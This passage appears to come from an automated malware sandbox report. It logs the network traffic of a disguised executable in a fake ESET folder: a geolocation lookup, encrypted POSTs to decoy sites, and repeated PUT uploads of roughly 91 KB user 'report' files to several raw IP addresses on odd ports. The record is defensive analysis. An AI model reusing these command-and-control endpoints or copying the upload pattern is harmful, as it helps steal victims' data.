arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:12.224026918 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:12.324160099 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:12 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:12.424309015 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:12 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.16	49763	208.95.112.1	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:09.822374105 CET	85	OUT	GET /line?fields=query,country HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 1, 2024 22:52:11.074321032 CET	197	IN	HTTP/1.1 200 OK Date: Sun, 01 Dec 2024 21:52:09 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 27 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a Data Ascii: United States8.46.123.228

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.16	49764	104.26.6.177	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:11.589751005 CET	124	OUT	POST /8LRAjeh6l2?223=0 HTTP/1.1 Host: blog.cyble.com Content-Length: 223 Expect: 100-continue Connection: Keep-Alive
Dec 1, 2024 22:52:11.953381062 CET	223	OUT	Data Raw: 57 39 6f c9 30 e6 ff 27 c7 04 8c a9 f8 62 39 6c f7 c9 74 9f ba fa 0d 97 ab c4 e9 fc f4 14 37 09 e3 89 93 a1 88 5b 26 21 71 9b 37 e4 81 15 7b 2f 8b ad 09 ac 65 43 18 5c 2b d7 1e 6c fd 03 32 b3 cc 82 c6 6e ce 97 e3 9b a3 52 2d 1f c3 29 15 95 49 b9 Data Ascii: W9o0'b9lt7[&!q7{/eC\+l2nR-)IpFq7u<$nhNam"CA&!1_.?G<X}\|ys\| (!UAZAoMCPL:c;,`48CBr#Ucq
Dec 1, 2024 22:52:12.722075939 CET	25	IN	HTTP/1.1 100 Continue
Dec 1, 2024 22:52:12.966609955 CET	821	IN	HTTP/1.1 301 Moved Permanently Date: Sun, 01 Dec 2024 21:52:12 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Sun, 01 Dec 2024 22:52:12 GMT Location: https://cyble.com/blog?223=0 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uMZ%2B2xZE5WYq5AC59xAnf1MICnyb2vOoKCaYQxyvTDD4BhTyCApxOqBsB2cLioFgra2hFIqfX3Jb8RD95G5pjkEt1bNC4dTzXgMYCaOfV%2Fz%2BA%2FrVp8iAAMuEqfob2ZZW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8eb64d8e7beb8c6b-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.16	49765	104.244.42.129	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:11.595387936 CET	121	OUT	POST /f10RkK61wN?197=0 HTTP/1.1 Host: twitter.com Content-Length: 197 Expect: 100-continue Connection: Keep-Alive
Dec 1, 2024 22:52:11.953366041 CET	197	OUT	Data Raw: 57 39 6f c9 30 e6 ff 27 c7 04 8c a9 f8 62 39 6c f7 c9 74 9f ba fa 0d 97 ab c4 e9 fc f4 14 37 09 e3 89 93 a1 88 5b 26 21 71 9b 37 e4 81 15 7b 2f 8b ad 09 ac 65 43 18 5c 2b d7 1e 6c fd 03 32 b3 cc 82 c6 6e ce 97 e3 9b a3 52 2d 1f c3 29 15 95 49 b9 Data Ascii: W9o0'b9lt7[&!q7{/eC\+l2nR-)IpFq7u<$nhNam"CA&!1_.?G<X}\|ys\| (!UAZAoMCPL:c;,`
Dec 1, 2024 22:52:12.728965998 CET	25	IN	HTTP/1.1 100 Continue
Dec 1, 2024 22:52:12.961347103 CET	358	IN	HTTP/1.1 301 Moved Permanently perf: 7402827104 location: https://twitter.com/f10RkK61wN?197=0 cache-control: no-cache, no-store, max-age=0 content-length: 0 x-transaction-id: 001a5edc212a005c x-response-time: 1 x-connection-hash: 6cc4bbebb53471372570758178a3112873f205ff54a6d8e56dd30c419bd42b97 date: Sun, 01 Dec 2024 21:52:12 GMT server: tsa_b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.16	49766	140.238.218.94	8080	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:11.600003958 CET	144	OUT	PUT /6CXyo_user%40888683_report.wsr HTTP/1.1 Host: 140.238.218.94:8080 Content-Length: 91378 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.16	49769	46.235.26.83	8080	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:13.272559881 CET	142	OUT	PUT /PWOYf_user%40888683_report.wsr HTTP/1.1 Host: 46.235.26.83:8080 Content-Length: 91361 Expect: 100-continue Connection: Keep-Alive
Dec 1, 2024 22:52:15.125200987 CET	321	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/plain; charset=utf-8 Server: Transfer.sh HTTP Server X-Content-Type-Options: nosniff X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Date: Sun, 01 Dec 2024 21:52:14 GMT Content-Length: 24 Connection: close Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a Data Ascii: Could not save metadata

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.16	49771	168.119.121.16	8080	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:15.249587059 CET	144	OUT	PUT /PWOYf_user%40888683_report.wsr HTTP/1.1 Host: 168.119.121.16:8080 Content-Length: 91361 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.16	49772	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:15.250762939 CET	75	OUT	GET /5N5Gv78Z7d?s=194 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Dec 1, 2024 22:52:16.867528915 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:16 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:16.867549896 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.16	49774	51.77.125.62	8080	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:17.628987074 CET	142	OUT	PUT /PWOYf_user%40888683_report.wsr HTTP/1.1 Host: 51.77.125.62:8080 Content-Length: 91361 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.16	49776	46.235.26.83	8080	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:33.679950953 CET	142	OUT	PUT /6CXyo_user%40888683_report.wsr HTTP/1.1 Host: 46.235.26.83:8080 Content-Length: 91378 Expect: 100-continue Connection: Keep-Alive
Dec 1, 2024 22:52:35.512845039 CET	321	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/plain; charset=utf-8 Server: Transfer.sh HTTP Server X-Content-Type-Options: nosniff X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Date: Sun, 01 Dec 2024 21:52:35 GMT Content-Length: 24 Connection: close Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a Data Ascii: Could not save metadata

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.16	49777	168.119.121.16	8080	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:35.635608912 CET	144	OUT	PUT /6CXyo_user%40888683_report.wsr HTTP/1.1 Host: 168.119.121.16:8080 Content-Length: 91378 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.16	49778	51.77.125.62	8080	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:37.961215973 CET	142	OUT	PUT /6CXyo_user%40888683_report.wsr HTTP/1.1 Host: 51.77.125.62:8080 Content-Length: 91378 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.16	49779	185.189.159.121	8001	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:39.670903921 CET	145	OUT	PUT /PWOYf_user%40888683_report.wsr HTTP/1.1 Host: 185.189.159.121:8001 Content-Length: 91361 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.16	49780	65.21.49.163	8080	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:41.988377094 CET	142	OUT	PUT /PWOYf_user%40888683_report.wsr HTTP/1.1 Host: 65.21.49.163:8080 Content-Length: 91361 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.16	49781	167.86.115.218	9090	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:44.420159101 CET	144	OUT	PUT /PWOYf_user%40888683_report.wsr HTTP/1.1 Host: 167.86.115.218:9090 Content-Length: 91361 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.16	49782	185.189.159.121	8001	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:53:00.048701048 CET	145	OUT	PUT /6CXyo_user%40888683_report.wsr HTTP/1.1 Host: 185.189.159.121:8001 Content-Length: 91378 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.16	49783	172.217.19.164	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:53:00.049262047 CET	75	OUT	GET /5N5Gv78Z7d?s=194 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Dec 1, 2024 22:53:01.675858974 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:53:01 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:53:01.677354097 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.16	49784	65.21.49.163	8080	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:53:01.800460100 CET	142	OUT	PUT /6CXyo_user%40888683_report.wsr HTTP/1.1 Host: 65.21.49.163:8080 Content-Length: 91378 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.16	49785	167.86.115.218	9090	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:53:04.188991070 CET	144	OUT	PUT /6CXyo_user%40888683_report.wsr HTTP/1.1 Host: 167.86.115.218:9090 Content-Length: 91378 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.16	49786	46.226.106.173	8080	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:53:06.514858007 CET	144	OUT	PUT /PWOYf_user%40888683_report.wsr HTTP/1.1 Host: 46.226.106.173:8080 Content-Length: 91361 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.16	49787	46.226.106.173	8080	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:53:26.297007084 CET	144	OUT	PUT /6CXyo_user%40888683_report.wsr HTTP/1.1 Host: 46.226.106.173:8080 Content-Length: 91378 Expect: 100-continue Connection: Keep-Alive

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.16	49767	104.244.42.129	443	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-01 21:52:14 UTC	77	OUT	GET /f10RkK61wN?197=0 HTTP/1.1 Host: twitter.com Connection: Keep-Alive
2024-12-01 21:52:14 UTC	9185	IN	HTTP/1.1 302 Found date: Sun, 01 Dec 2024 21:52:14 GMT perf: 7402827104 vary: Accept expiry: Tue, 31 Mar 1981 05:00:00 GMT pragma: no-cache server: tsa_b location: https://x.com/f10RkK61wN?197=0 set-cookie: guest_id_marketing=v1%3A173308993461448974; Max-Age=63072000; Expires=Tue, 01 Dec 2026 21:52:14 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None set-cookie: guest_id_ads=v1%3A173308993461448974; Max-Age=63072000; Expires=Tue, 01 Dec 2026 21:52:14 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None set-cookie: personalization_id="v1_bExZZ9lftWKu4tMFBTvCSg=="; Max-Age=63072000; Expires=Tue, 01 Dec 2026 21:52:14 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None set-cookie: guest_id=v1%3A173308993461448974; Max-Age=63072000; Expires=Tue, 01 Dec 2026 21:52:14 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None set-cookie: ct0=; Max-Age=-1733089933; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=Lax content-type: text/plain; charset=utf-8 x-powered-by: Express cache-control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 last-modified: Sun, 01 Dec 2024 21:52:14 GMT content-length: 52 x-frame-options: DENY x-transaction-id: dcd83e843c374cbd x-xss-protection: 0 x-content-type-options: nosniff content-security-policy: connect-src 'self' blob: https://.pscp.tv https://.twimg.com https://.video.pscp.tv https://aa.twitter.com https://aa.x.com https://accounts.google.com/gsi/ https://ads-api.twitter.com https://ads-api.x.com https://api-stream.twitter.com https://api-stream.x.com https://api.twitter.com https://api.x.ai https://api.x.com https://api.x.com https://caps.twitter.com https://caps.x.com https://jf.twitter.com https://jf.x.com https://pay.twitter.com 